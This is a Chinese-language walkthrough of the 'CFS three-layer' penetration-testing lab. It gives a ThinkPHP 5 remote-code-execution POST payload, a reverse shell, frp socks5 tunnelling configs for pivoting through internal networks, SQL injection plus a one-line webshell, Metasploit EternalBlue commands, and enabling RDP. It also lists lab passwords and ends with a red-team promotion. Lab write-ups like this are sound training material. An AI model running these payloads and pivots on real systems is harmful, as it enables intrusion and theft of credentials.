CFS三层靶机

网络拓扑

IP地址规划

攻击网段 192.168.1.0

网段1服务器：192.168.1.0/24

192.168.22.0/24

网段2服务器：192.168.22.0/24

192.168.33.0/24

网段3服务器：192.168.33.0/24

VM虚拟网站配置的话需要配置三张网卡，这里通外网的我设置为了桥接，网段2就是VM2网段3就是VM3

接着进入到宝塔里面修改网站的配置，http://192.168.1.104:8888/a768f109/ 为宝塔的入口，账号：eaj3yhsl 密码：41bb8fee

接着修改运行目录为二级目录中的public

接着访问到WEB服务器的80端口，大大的ThinkPHP V5映入眼帘！

对网站的目录进行扫描，这里扫描除了有robots.txt文件，访问这个文件获取到了第一个flag!

使其报错，发现它的版本是可能存在远程命令执行的版本！等下可以试一下POC打过去

使用POC打过去发现是存在远程命令执行，这里显示出了PHP版本为7版本

URL:http://192.168.1.104//index.php?s=captcha

POST_DATA:_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo

接着在public目录下找到了flag!

接着使用whereis来查看有拿下可以反弹shell的命令，这里有nc bash python exec php

然后使用nc来反弹一个shell过来，反弹过来的shell是www的权限！然后使用Python获取一个shell外壳

接着ctrl + z 回到原来的shell中，接着输入stty raw -echo 之后再输入fg 获取一个有补全命令和防止端口的shell！

查看网卡信息，发现WEB服务器是双网卡的服务器，还有一张网卡通向192.168.22.0/24网段

接着可以进行内网代理，然后进入到内网进行下一步的渗透！这里使用frp来进行socks5代理进入内网！ 首先按照相应的版本下载frp的文件

https://github.com/fatedier/frp/releases

首先配置服务端的配置文件frps.ini

[common]

bind_addr = 0.0.0.0

bind_port = 7000

dashboard_port = 7500

# 用户密码需要配置强密码

dashboard_user = admin_admin

dashboard_pwd = admin_admin

# 允许客户端绑定的端口

allow_ports = 40000-50000

然后输入命令开启frps服务器的监听。

# 启动 nohup ./frps -c frps.ini &

接着配置客户端的frpc.ini配置文件。这里是配置它的socks5的代理。所以配置文件里面需要加socks5。然后 ./frpc -c frpc.ini 启动连接

[common]

# 远程VPS地址

server_addr = 192.168.1.107

server_port = 7000

tls_enable = true

pool_count = 5

[plugin_socks]

type = tcp

remote_port = 46075

plugin = socks5

plugin_user = admin_admin

plugin_passwd = admin_admin

use_encryption = true

use_compression = true

连接之后可以再web管理页面查看到已经后socks5的代理隧道已经建立完成！

接着使用Proxifier 工具进行代理，IP就是192.168.1.107端口就是40075，需要加上账号和密码！接着使用nmap对这个IP进行扫描，发现开启了80端口和8888端口。8888端口就是宝塔的端口！

接着访问80端口，发现是一个使用八哥CMS搭建的网站！

接着再robots.txt这个文件中找到了网站后台的登陆地址！

最骚的就是再网页源码这里发现了一个HTML注释写着有注入漏洞，是不是程序员为了报复老板啊！

果然就是报复老板吧！这里的确有SQL注入漏洞！这里直接爆出它的后台密码出来！

直接进入到后台，进来之后再备忘录之里找到了flag！

接着到site/index.php这个php文件中插入一句话木马进去！获取webshell

接着再蚁剑这里设置代理，然后把webshell添加到蚁剑

然后再192.168.22.129这台主机的网站upload目录下找到了flag!

切换到192.168.22.129这台主机的根目录，发现了这台主机的第三个flag!

查看这台主机的IP地址，发现这台主机也是双网卡的主机，另一张网卡通向192.168.33.0/24网段

接着上传frps到192.168.1.104这台WEB机器上面，并且监听7000端口！

然后把frpc和frpc.ini上传到192.168.22.129这台再网段2的机器上面！配置如下

[common]

server_addr = 192.168.22.128

server_port = 7000

[plugin_socks5_2]

type = tcp

remote_port = 46076

plugin = socks5

接着再网段 1 IP地址192.168.1.104这台WEB机器上面修改frp配置，添加本地端口转发。 这个本地端口转发的意思就是将网段2 的流量都转到本地的46077这个端口上面，由于46076这个端口是网段2 frp客户端连接过来的端口，那么就可以通过这个端口访问到网段2可以访问的网段3了！

[common]

# 远程VPS地址

server_addr = 192.168.1.107

server_port = 7000

tls_enable = true

pool_count = 5

[plugin_socks]

type = tcp

remote_port = 46075

plugin = socks5

plugin_user = admin_admin

plugin_passwd = admin_admin

use_encryption = true

use_compression = true

[proxy_to_network33]

type = tcp

local_ip = 127.0.0.1

local_port = 46076

remote_port = 46077

配置好了之后可以在WEB管理页面上面看到多了一个本地转发的端口！

接着使用代理测试一下，这里代理的端口就是46077这个可以访问网段3的端口。然后再通过这个端口端口就可以访问得到网段3的机器了！

这样的话就已经可以访问到网段3 了。通过对该网段的扫描发现该网段存活192.168.33.33这台主机，接着对其进行端口扫描发现开启了445端口。

对其进行永恒之蓝的扫描发现存在漏洞，直接刚一波永恒之蓝过去发现成功的获取了shell！并且获取了这台机器的账号密码

use exploit/windows/smb/ms17_010_eternalblue

set rhosts 192.168.33.33

set payload windows/x64/meterpreter/bind_tcp

run

使用如下命令开启3389端口，接着使用账号密码登陆进去这台网段3的机器！ run post/windows/manage/enable_rdp

proxychains rdesktop -u administrator -p teamssix.com 192.168.33.33

渗透测试 红队攻防 免杀 权限维持 等等技术

及时分享最新漏洞复现以及EXP 国内外最新技术分享!!!

进来一起学习吧